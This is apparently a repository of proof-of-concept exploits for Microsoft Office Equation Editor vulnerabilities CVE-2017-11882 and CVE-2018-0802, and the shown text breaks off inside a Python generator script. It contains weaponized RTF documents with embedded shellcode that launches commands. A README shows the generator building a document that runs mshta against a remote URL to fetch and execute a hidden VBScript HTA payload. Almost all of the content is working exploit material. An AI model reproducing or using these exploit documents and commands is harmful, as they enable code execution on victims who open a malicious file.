├── MS17-010
    ├── README.md
    └── ms17-010.py
├── README.md
├── CVE-2017-11882
    ├── README.md
    ├── samples
    │   ├── exploit1.rtf
    │   └── exploit3.rtf
    ├── Command_CVE_2017-11882_109.py
    └── Command_CVE-2017-11882.py
└── CVE-2018-0802
    ├── cve-2018-0802.rtf
    └── cve-2018-0802_poc.py


/MS17-010/README.md:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # POC
2 | 


--------------------------------------------------------------------------------
/CVE-2017-11882/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2017-11882
 2 | ## Reference
 3 | https://github.com/embedi/CVE-2017-11882
 4 | 
 5 | https://github.com/unamer/CVE-2017-11882
 6 | 
 7 | # Usage 
 8 | - cmd 
 9 | ```
10 | python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
11 | ```
12 | - mshta 
13 | ```
14 | python Command_CVE-2017011882.py -c "mshta http://xxx.com/123" -o test.doc
15 | ```
16 | 123
17 | ```
18 | <HTML> 
19 | <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
20 | <HEAD> 
21 | <script language="VBScript">
22 | Window.ReSizeTo 0, 0
23 | Window.moveTo -2000,-2000
24 | Set objShell = CreateObject("Wscript.Shell")
25 | objShell.Run "calc.exe"
26 | self.close
27 | </script>
28 | <body>
29 | demo
30 | </body>
31 | </HEAD> 
32 | </HTML>
33 | ```
34 | 
35 | 
36 | 
37 | 


--------------------------------------------------------------------------------
/CVE-2017-11882/samples/exploit1.rtf:
--------------------------------------------------------------------------------
 1 | {\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
 2 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
 3 | \pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000000003000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4ee5b0000000000030101030a0a01085a5a636d642e657865202f632063616c632e65786520414141414141414141414141414141414141414141414141120c430000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006f006e0020004e00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000004000000c5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d61746854797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e657720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a600190160a000000313131313131313131310c000000320a6001100f0a000000313131313131313131310c000000320a600190070a000000313131313131313131310c000000320a600110000a000000313131313131313131310a00000026060f000a00ffffffff0100000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff7cef1800040000002d01010004000000f0010000030000000000
 4 | }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
 5 | 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
 6 | 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
 7 | 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
 8 | 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
 9 | 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
10 | 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
11 | 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
12 | 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
13 | 00000000
14 | }}}
15 | \par}
16 | 


--------------------------------------------------------------------------------
/CVE-2018-0802/cve-2018-0802.rtf:
--------------------------------------------------------------------------------
 1 | {\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
 2 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
 3 | \pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000000003000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4ee5b0000000000030101030a0a01085a5a33c099b202c1e2082be2e8ffffffffc35b50648b40308b400899b203c1e21066ba120c03c28d5b1c53ffe0636d642e657865202f632063616c632e6578652023202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020250000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006f006e0020004e00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000004000000c5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d61746854797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e657720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a600190160a000000313131313131313131310c000000320a6001100f0a000000313131313131313131310c000000320a600190070a000000313131313131313131310c000000320a600110000a000000313131313131313131310a00000026060f000a00ffffffff0100000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff7cef1800040000002d01010004000000f0010000030000000000
 4 | }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
 5 | 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
 6 | 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
 7 | 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
 8 | 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
 9 | 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
10 | 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
11 | 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
12 | 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
13 | 00000000
14 | }}}
15 | \par}
16 | 


--------------------------------------------------------------------------------
/CVE-2017-11882/samples/exploit3.rtf:
--------------------------------------------------------------------------------
 1 | {\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
 2 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
 3 | \pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020cea5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006f006d0070004f0062006a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004f0062006a0049006e0066006f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201ffffffff04000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
 4 | 1c00000002009ec4a900000000000000c8a75c00c4ee5b0000000000030101030a0a01085a5ab844eb7112ba7856341231d08b088b098b096683c13c31db5351be643e721231d6ff16536683ee4cff109090142140000000636d642e657865202f6320636d642e65786520737461727420636d642e657865202f6320726567656469742e657865202620636d642e657865202f632063616c632e65786500000000000000000000000000000000000000000000000000000000000000000000000000000000
 5 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000C5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A600190160A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A000000313131313131313131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F0010000030000000000
 6 | }{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}
 7 | {\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}
 8 | {\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}
 9 | {\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0
10 | \picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02
11 | 00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}
12 | \par}
13 | 


--------------------------------------------------------------------------------
/CVE-2018-0802/cve-2018-0802_poc.py:
--------------------------------------------------------------------------------
  1 | import argparse
  2 | 
  3 | 
  4 | RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
  5 | {\*\generator Riched20 6.3.9600}\viewkind4\uc1
  6 | \pard\sa200\sl276\slmult1\f0\fs22\lang9"""
  7 | 
  8 | 
  9 | RTF_TRAILER = R"""\par}
 10 | """
 11 | 
 12 | 
 13 | OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
 14 | 
 15 | 
 16 | OBJECT_TRAILER = R"""
 17 | }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
 18 | 0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
 19 | 0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
 20 | 1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
 21 | 0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
 22 | 0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
 23 | 002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
 24 | 000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
 25 | 0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
 26 | 00000000
 27 | }}}
 28 | """
 29 | 
 30 | 
 31 | OBJDATA_TEMPLATE = R"""
 32 | 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
 33 | b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
 34 | 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
 35 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 36 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 37 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 38 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 39 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 40 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 41 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 42 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 43 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 44 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 45 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
 46 | fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 47 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 48 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 49 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 50 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 51 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 52 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 53 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 54 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 55 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 56 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 57 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 58 | ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
 59 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 60 | 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
 61 | 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
 62 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
 63 | 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
 64 | 0000000000000000000000000000000000000000000000000000001400000000000000010043006f
 65 | 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
 66 | 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
 67 | 00000000000000000000000000000000000000000000000000000000000000010000006600000000
 68 | 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
 69 | 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
 70 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
 71 | 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
 72 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 73 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
 74 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
